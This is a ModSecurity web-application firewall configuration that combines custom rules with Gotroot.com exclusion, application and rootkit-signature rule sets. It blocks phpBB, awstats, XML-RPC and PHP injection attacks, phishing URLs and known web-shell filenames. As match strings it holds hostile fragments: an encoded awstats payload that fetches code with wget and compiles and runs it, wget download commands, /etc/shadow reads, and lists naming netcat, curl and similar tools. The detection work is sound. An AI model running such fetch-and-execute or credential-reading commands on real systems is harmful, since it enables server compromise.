# referer spam common sites
SecFilterSelective "HTTP_REFERER" "(go\.to|get\.to|drop\.to|hey\.to|switch\.to|dive\.to|move\.to|again\.at)"
# phpbb exploits
SecFilterSelective THE_REQUEST "chr(101)%252echr(99)%252echr(104)"
SecFilterSelective THE_REQUEST "chr(99)%252echr(100)%252echr(32)"
SecFilterSelective THE_REQUEST "wget%20www.geocities.com/supahacker/bz.tgz"
SecFilterSelective THE_REQUEST "addnew&install_to=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./tmp"
# awstats exploit
SecFilterSelective THE_REQUEST "configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20http%3a%2f%2fawsimple%2etripod%2ecom%2fm%2ftest%2ec%3bgcc%20%2do%20nfsiod%20test%2ec%3b%2e%2fnfsiod%3becho
%20e_exp%3b%2500"
SecFilterSelective THE_REQUEST "configdir=%20%7c"
# Protect against phpBB2 Exploits
SecFilter "viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"
SecFilterSelective HTTP_USER_AGENT "phpBB2 exploit"
# Exploit phpBB Highlighting Code Execution Attempt
SecFilterSelective THE_REQUEST "&highlight='\.system\("
# Exploit phpBB Highlighting SQL Injection
SecFilterSelective THE_REQUEST "&highlight='\.mysql_query\("
# Exploit phpBB Highlighting Code Execution - Santy.A Worm
SecFilterSelective THE_REQUEST "&highlight='\.fwrite\(fopen\("
# Exploit phpBB Highlight Exploit Attempt
SecFilterSelective ARG_highlight %27
# Common web exploit
SecFilterSelective THE_REQUEST "cmd=cd /var/tmp;wget "
SecFilterSelective THE_REQUEST "cmd=cd /tmp; wget "
SecFilterSelective THE_REQUEST "cmd=cd /var/tmp;ls;wget "
#Specific XML-RPC attacks on xmlrpc.php
SecFilterSelective THE_REQUEST "/xmlrpc\.php" chain
SecFilter "\<*xml" chain
SecFilter "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_
kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"
# block common phish site URLs
SecFilterSelective THE_REQUEST "aw/eBayISAPI"
SecFilterSelective THE_REQUEST "paypal-login"
SecFilterSelective THE_REQUEST "paypalmembers"
SecFilterSelective THE_REQUEST "paypal.cgi-bin"
SecFilterSelective THE_REQUEST "secure.cgi.paypal.com"
SecFilterSelective THE_REQUEST "wellsfargo.cgi.bin"
SecFilterSelective THE_REQUEST "cgibin-webscr"
SecFilterSelective THE_REQUEST "signin.ebay.com"
# spammer bcc header injections
SecFilterSelective POST_PAYLOAD "bcc:.*@.*"
Include /dh/apache2/template/etc/mod_sec_gotroot_exclude.conf
Include /dh/apache2/template/etc/mod_sec_gotroot_rootkits.conf
Include /dh/apache2/template/etc/mod_sec_gotroot_generic.conf
# http://www.gotroot.com/mod_security+rules
# Gotroot.com ModSecurity rules
#
# Created by The Prometheus Group (http://www.prometheus-group.com)
#
# Exclusion Rules
#
# Download from: http://www.gotroot.com/downloads/ftp/mod_security/exclude.conf
# Copyright 2005, all rights reserved.
#
# Commercial redistribution prohibited.
#
# IMPORTANT NOTE! These rules must be loaded FIRST in your rule orderset to override
# other rules. If you load them later, they will not work!
#
# Version: N-20050905-01
###########################################
#Generic SQL injection rule exclusions
###########################################
#generic PHP forum posting exclusion
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
#PhpBB posting
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
#Postnuke uploads
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
#Squirrel mail and Horde postings
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
#Phorum posting
SecFilterSelective POST_PAYLOAD "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
SecFilterSelective POST_PAYLOAD "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
###########################################
#Double pipe exclusion rules
###########################################
SecFilterSelective THE_REQUEST "\|+.*[\x20].*[\x20].*\|" pass,nolog
###########################################
#Front page exclusions
###########################################
SecFilterInheritance Off
# http://www.gotroot.com/mod_security+rules
# Gotroot.com ModSecurity rules
#
# Created by The Prometheus Group (http://www.prometheus-group.com)
#
# Application Security Rules
#
# Download from: http://www.gotroot.com/downloads/ftp/mod_security/rules.conf
# Copyright 2005, all rights reserved.
#
# Commercial redistribution prohibited.
#
# Version: N-20051120-01
#--------------------------------
# notes
#--------------------------------
#--------------------------------
#start rules
#--------------------------------
#Enforce proper HTTP requests
SecFilterSelective THE_REQUEST "!HTTP\/(0\.9|1\.0|1\.1)$"
# Only accept request encodings we know how to handle
# we exclude GET requests from this because some (automated)
# clients supply "text/html" as Content-Type
# DreamHost added REPORT for subversion on Apache 2 only
SecFilterSelective REQUEST_METHOD "!^(GET|HEAD|POST|PUT|PROPFIND|OPTIONS|LOCK|REPORT)$" chain
SecFilterSelective HTTP_Content-Type "!(^$|^application/x-www-form-urlencoded$|^multipart/form-data)"
# Require Content-Length to be provided with
# every POST request
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"
# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
SecFilterSelective HTTP_Transfer-Encoding "!^$"
#XSS insertion into Content-Type
SecFilterSelective THE_REQUEST "Content-Type\:.*(<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>|onmouseover=|javascript\:)"
#Don't accept chunked encodings
#modsecurity can not look at these, so this is a hole
#that can bypass your rules, the rule before this one
#should cover this, but hey paranoia is cheap
SecFilterSelective HTTP_Transfer-Encoding "chunked"
#Web Proxy GET Request
SecFilter "^GET (http|https|ftp)\:/"
#Web Proxy HEAD Request
SecFilter "^HEAD (http|https|ftp)\:/"
#Proxy POST Request
SecFilter "^POST (http|https|ftp)\:/"
#Generic PHP exploit signatures
SecFilterSelective THE_REQUEST "\;(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"
#slightly tighter rules with narrower focus
SecFilterSelective REQUEST_URI "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"
SecFilterSelective POST_PAYLOAD "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"
#prevent PHP error leakage
SecFilterSelective OUTPUT "Fatal error:"
#generic XSS PHP attack types
SecFilterSelective THE_REQUEST "\.php\?" chain
SecFilter "javascript\:/(.*new\x20ActiveXObject.*Sh\.regwrite|.*window\.opener\.document\.body.\innerHTML=window\.opener\.document\.body\.innerHTML\.replace)"
#Prevent SQL injection in cookies
SecFilterSelective COOKIE_VALUES "((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|UNION SELECT.*\'.*\'.*,[0-9].*INTO.*FROM)"
#Generic command line attack filter
SecFilterSelective THE_REQUEST "\|+.*[\x20].*[\x20].*\|"
#PHP Injection Attack generic signature
SecFilterSelective THE_REQUEST "\.php*" chain
SecFilter "(\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|pagina|path|include_location|root|page|gorumDir|site|pun_root|open|seite)=(http|https|ftp)\:/|(cmd|command)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./|whoami|killall |rm \-[a-z|A-Z]))"
SecFilterSelective THE_REQUEST "\.php\?(((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|pagina|path|pathtoroot|include_location|gorumDir|root|page|site|pun_root|open|seite)=(http|https|ftp)\:/|.*(cmd|command)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat)|rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z]))"
#Generic PHP remote file inclusion attack signature
SecFilterSelective THE_REQUEST "\.php\?" chain
SecFilter "(http|https|ftp)\:/" chain
SecFilter "(cmd|command)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"
SecFilterSelective THE_REQUEST "\.php\?" chain
SecFilter "(http|https|ftp)\:/" chain
SecFilter "(cmd|command)=.*(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"
#Genenric PHP body attack
SecFilterSelective THE_REQUEST "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)" chain
SecFilterSelective POST_PAYLOAD "^PHP\:*((cd|mkdir)[[:space:]]+(/|[A-Z|a-z|0-9]|\.)*|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat)|rexec |smbclient |t?ftp |ncftp |chmod |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"
#script, perl, etc. code in HTTP_Referer string
SecFilterSelective HTTP_Referer "\#\!.*/"
#generic command line attack
SecFilterSelective THE_REQUEST "\|*id\;echo*\|"
SecFilterSelective ARGS "\|*id\;echo*\|"
#remote file inclusion generic attack signature
SecFilterSelective THE_REQUEST "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?" chain
SecFilter "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)"
SecFilterSelective THE_REQUEST "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?\&(cmd|command|inc|name)="
SecFilterSelective ARGS "\.(dat|gif|jpg|png|bmp|txt|vir|dot)" chain
SecFilter "\?\&(cmd|inc|name)="
SecFilterSelective ARGS "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?\&(cmd|inc|name)="
SecFilterSelective REQUEST_URI "\.php\?.*=(http|https|ftp)\:/.*\?&cmd="
#Bogus file extensions generic signature
SecFilterSelective THE_REQUEST "[A-Za-z0-9]\.(gif|jpg|png|bmp)\.txt"
#PHP remote path attach generic signature
SecFilterSelective REQUEST_URI "\.ph(p(3|4)?).*path=(http|https|ftp)\:/"
SecFilterSelective REQUEST_URI "\.php.*path=(http|https|ftp)\:/"
#generic attack sig
SecFilterSelective THE_REQUEST "cd\x20*\;(cd|\;|echo|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./)"
# WEB-ATTACKS uname -a command attempt
SecFilterSelective THE_REQUEST "uname" chain
SecFilter "\x20-a"
#generic php attack sigs
SecFilterSelective REQUEST_URI "&(cmd|command)=(id|uname)\x20"
SecFilterSelective REQUEST_URI "cmd\?(cmd|command)="
SecFilterSelective REQUEST_URI "(spy|cmd|cmd_out|sh)\.(gif|jpg|png|bmp|txt)\?&(cmd|command)="
SecFilterSelective REQUEST_URI "\.php\?&(cmd|command)="
#Generic PHP attack sig
SecFilterSelective THE_REQUEST "system\(getenv\(HTTP_PHP\)\)"
# WEB-ATTACKS /etc/shadow access
SecFilterSelective THE_REQUEST "/etc/shadow"
#remote bash shell
SecFilterSelective THE_REQUEST "/shell\.php\&cmd="
SecFilterSelective ARGS "/shell\.php\&cmd="
#Generic PHP payload command injection and upload vulnerabilities
SecFilterSelective POST_PAYLOAD "<\?php" chain
SecFilter "((fputs|fread)\(.*\,.*\)\;|fsockopen\(gethostbyname|chr\(.*\)\.chr\(.*\)\.chr\(|(fclose|fgets)\(.*\)\;|(system|exec)\(.*\)\;)" chain
SecFilter "\<\?php"
#http://www.gotroot.com/mod_security+rules
#
# Created by The Prometheus Group (http://www.prometheus-group.com)
#
#Known rootkit, remote toolkit, etc. signature
#
#Download from: http://www.gotroot.com/downloads/ftp/mod_security/rootkits.conf
#copyright 2005, all rights reserved
#
# Commercial redistribution prohibited.
#
#Version: N-20051120-01
#
#http://www.gotroot.com
#see website for more information
SecFilterSelective THE_REQUEST "/cse\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/terminatorX-exp.*\.(gif|jpg|txt|bmp|php)\?"
SecFilterSelective THE_REQUEST "/\.it/viewde"
SecFilterSelective THE_REQUEST "/cmd\?&(command|cmd)="
SecFilterSelective THE_REQUEST "/cmd\.php\.ns\?&(command|cmd)="
SecFilterSelective THE_REQUEST "/cmd\.dat\?&(command|cmd)="
SecFilterSelective THE_REQUEST "/sep\.txt\?&(command|cmd)="
SecFilterSelective THE_REQUEST "/s\.txt\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/pro18\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/shell\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/bash\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/(o|0|p)wn(e|3)d\.(gif|jpg|txt|bmp)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/get\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/root\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/spy\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/nmap\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/asc\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/lila\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/sh\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/new(cmd|command)\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/(cmd|command)\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/(cmd|command)[0-9]\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/[a-z](cmd|command)\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/[a-z](cmd|command)[0-9]\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/ijoo\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/oinc\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/a\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/gif\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/jpg\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/ion\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/lala\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/phpshell\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/tool[12][05]\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/tool[12]\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/tool[12][0-9]\.js"
SecFilterSelective THE_REQUEST "/tool25\.js"
#Known rootkits
SecFilterSelective THE_REQUEST "perl xpl\.pl"
SecFilterSelective THE_REQUEST "perl kut"
SecFilterSelective THE_REQUEST "perl viewde"
SecFilterSelective THE_REQUEST "perl httpd\.txt"
SecFilterSelective THE_REQUEST "\./xkernel\;"
SecFilterSelective THE_REQUEST "/kaiten\.c"
SecFilterSelective THE_REQUEST "/mampus\?&(cmd|command)"
#Known rootkit Defacing Tool 2.0
SecFilterSelective THE_REQUEST "/tool(12)[0-9]\.(d(ao)t|gif|jpg|bmp|txt)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/tool\.(d(ao)t|gif|jpg|bmp|txt)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/tool25\.(d(ao)t|gif|jpg|bmp|txt)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/tool(12)\.(d(ao)t|gif|jpg|bmp|txt)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/therules25\.(d(ao)t|gif|jpg|bmp|txt)\?(cmd|command)="
SecFilterSelective THE_REQUEST "/tool25\.jpg\?"
SecFilterSelective THE_REQUEST "/tool25\.dat\?"
#other known tools
SecFilterSelective THE_REQUEST "/xpl\.php\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/ssh\.php"
SecFilterSelective THE_REQUEST "/ssh2\.php"
SecFilterSelective THE_REQUEST "/sfdg2\.php"
#New kit
SecFilterSelective THE_REQUEST "/\.dump/(bash|httpd)(\;|\w)"
SecFilterSelective THE_REQUEST "/\.dump/(bash|httpd)\.(txt|php|gif|jpg|dat|bmp|png)(\;|\w)"
#new kir
SecFilterSelective THE_REQUEST "/dblib\.php\?&(cmd|command)="
#suntzu
SecFilterSelective THE_REQUEST "/suntzu\.php\?cmd="
#proxysx.gif?
SecFilterSelective THE_REQUEST "/proxysx\.(gif|jpg|bmp|txt)\?"
#phpbackdoor
SecFilterSelective THE_REQUEST "/phpbackdoor\.php\?cmd="
SecFilterSelective THE_REQUEST "/phpbackdoor.*\.php\?cmd="
#new unknown kit
SecFilterSelective REQUEST_URI "/oops?&"
# known PHP attack shells
#value of these sigs, pretty low, but here to catch
# any lose threads, honeypoting, etc.
SecFilterSelective THE_REQUEST "/img/wiki_up/.*\.(php(3|4)?|tml|cgi|sh)"
SecFilterSelective THE_REQUEST "wiki_up/gif\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "wiki_up/ion\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "wiki_up/jpg\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "wiki_up/lala\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "wiki_up/.*\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "/phpshell\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "/tool20\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "/tool20\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "/temp/gif\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "/temp/lala\.ph(p(3|4)?|tml)"
SecFilterSelective REQUEST_URI "/phpterm"
#new unknown kits
SecFilterSelective THE_REQUEST "/iblis\.htm\?"
SecFilterSelective THE_REQUEST "/gif\.gif\?"
SecFilterSelective THE_REQUEST "/go\.php\.txt\?"
SecFilterSelective THE_REQUEST "/sh[0-9]\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/iys\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/shell[0-9]\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/zehir\.asp"
SecFilterSelective THE_REQUEST "/aflast\.txt\?"
SecFilterSelective THE_REQUEST "/sikat\.txt\?&cmd"
SecFilterSelective THE_REQUEST "/t\.gif\?"
SecFilterSelective THE_REQUEST "/phpbb_patch\?&"
SecFilterSelective THE_REQUEST "/phpbb2_patch\?&"
SecFilterSelective THE_REQUEST "/lukka\?&"